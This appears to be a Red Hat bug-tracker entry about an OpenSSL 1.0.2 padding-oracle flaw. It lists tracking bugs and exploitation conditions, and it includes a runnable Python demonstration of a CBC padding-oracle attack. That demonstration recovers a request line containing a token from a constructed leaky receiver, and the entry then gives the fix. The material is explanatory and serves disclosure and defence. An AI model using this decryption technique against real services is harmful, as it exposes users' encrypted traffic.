A vulnerability was found in OpenSSL 1.0.2. When an application encounters a fatal protocol error and then calls SSL_shutdown() twice, OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If this difference in behaviour can be detected by a remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable "non-stitched" ciphersuites must be in use. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). AEAD ciphersuites are not impacted. This issue does not impact OpenSSL 1.1.1 or 1.1.0.
Created compat-openssl10 tracking bugs for this issue:
Affects: fedora-all [bug 1683808]
Created mingw-openssl tracking bugs for this issue:
Affects: epel-7 [bug 1683806]
Affects: fedora-all [bug 1683805]
Created openssl tracking bugs for this issue:
Affects: fedora-all [bug 1683807]
This is essentially a padding oracle flaw, which needs the following conditions for exploitation:
1. Non-stitched cipher suites are used. (https://software.intel.com/en-us/articles/improving-openssl-performance talks about stitching cipher suites)
2. AES-NI is not used.
3. Applications must call SSL_shutdown() twice even if a protocol error has occurred.
4. The attacker must be able to run a script in the victim's browser which sends requests to a vulnerable website. This can be achieved by tempting the victim to visit a malicious website. Second, the attacker must be able to modify requests sent by the browser and observe the server behavior. The second prerequisite is much harder to achieve, because the attacker must be an active Man-in-the-Middle.
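Added example (not OpenSSL's or Red Hat's code): a self-contained Python illustration of the general CBC padding-oracle technique that the comment above calls the essence of this flaw. It uses a toy Feistel block cipher in place of AES and a constructed MAC-then-pad-then-encrypt record layout so that it runs with the standard library only; the receiver class, its error strings, the keys and the sample request line are all assumptions made for the demonstration. The attacker side never sees a key; it recovers the record purely from whether the receiver reports bad padding or something else.

```python
"""Constructed CBC padding-oracle demonstration; not OpenSSL code."""
import hashlib
import hmac
import os

BLOCK = 16      # block size of the toy cipher, same as AES
MAC_LEN = 32    # HMAC-SHA256 tag length

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte block cipher: 4-round Feistel network with a SHA-256 round
# function, standing in for AES. The attack does not depend on the cipher.
def _round(key: bytes, half: bytes, r: int) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for r in range(4):
        left, right = right, _xor(left, _round(key, right, r))
    return left + right

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for r in reversed(range(4)):
        left, right = _xor(right, _round(key, left, r)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n == 0 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    prev = os.urandom(BLOCK)            # explicit IV, sent as the first block
    out = [prev]
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def seal_record(enc_key: bytes, mac_key: bytes, data: bytes) -> bytes:
    """MAC, then pad, then encrypt: the TLS 1.x CBC record layout in miniature."""
    tag = hmac.new(mac_key, data, hashlib.sha256).digest()
    return cbc_encrypt(enc_key, pkcs7_pad(data + tag))

class LeakyReceiver:
    """Receiver whose error reporting tells bad padding apart from a bad MAC.
    That distinguishable behaviour is the oracle; a hardened receiver gives one
    indistinguishable failure (same alert, same timing) for both cases."""
    def __init__(self, enc_key: bytes, mac_key: bytes):
        self.enc_key, self.mac_key = enc_key, mac_key

    def open_record(self, ciphertext: bytes) -> str:
        try:
            body = pkcs7_unpad(cbc_decrypt(self.enc_key, ciphertext))
        except ValueError:
            return "BAD_PADDING"        # assumed verdict string, visible to the attacker
        data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
        expect = hmac.new(self.mac_key, data, hashlib.sha256).digest()
        if len(body) < MAC_LEN or not hmac.compare_digest(tag, expect):
            return "BAD_MAC"
        return "OK"

def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover the plaintext of `target` from oracle verdicts alone. Each query
    sends a crafted 'previous' block followed by the target, so the receiver's
    padding check runs on the target block by itself."""
    inter = bytearray(BLOCK)            # block_decrypt(key, target), learned byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        crafted = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):     # pin already-known bytes to the pad value
            crafted[j] = inter[j] ^ pad
        for guess in range(256):
            crafted[pos] = guess
            if oracle(bytes(crafted) + target) == "BAD_PADDING":
                continue
            if pos == BLOCK - 1:
                # A final byte of 0x02 next to a lucky 0x02 also passes; flipping
                # the preceding byte rules that false positive out.
                probe = bytearray(crafted)
                probe[pos - 1] ^= 0xFF
                if oracle(bytes(probe) + target) == "BAD_PADDING":
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no valid padding found for byte %d" % pos)
    return _xor(bytes(inter), prev)

def recover_plaintext(oracle, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))

def demo(data: bytes = b"GET /account?token=hunter2 HTTP/1.1") -> bytes:
    """Constructed sample: the attacker only gets LeakyReceiver.open_record verdicts."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    receiver = LeakyReceiver(enc_key, mac_key)
    padded = recover_plaintext(receiver.open_record, seal_record(enc_key, mac_key, data))
    return pkcs7_unpad(padded)[:-MAC_LEN]   # strip padding and MAC, leaving the data
```

Running `demo()` returns the request line without the attacker ever holding a key; roughly 128 queries per byte are needed on average. The receiver-side fix is the one the OpenSSL advisory describes for the library: make the bad-padding and bad-MAC paths indistinguishable to the peer. On the application side, the condition under the developer's control is condition 3 above: do not call SSL_shutdown() again after a fatal protocol error has been reported.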
This vulnerability is out of security support scope for the following product:
* Red Hat JBoss Web Server 3
Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.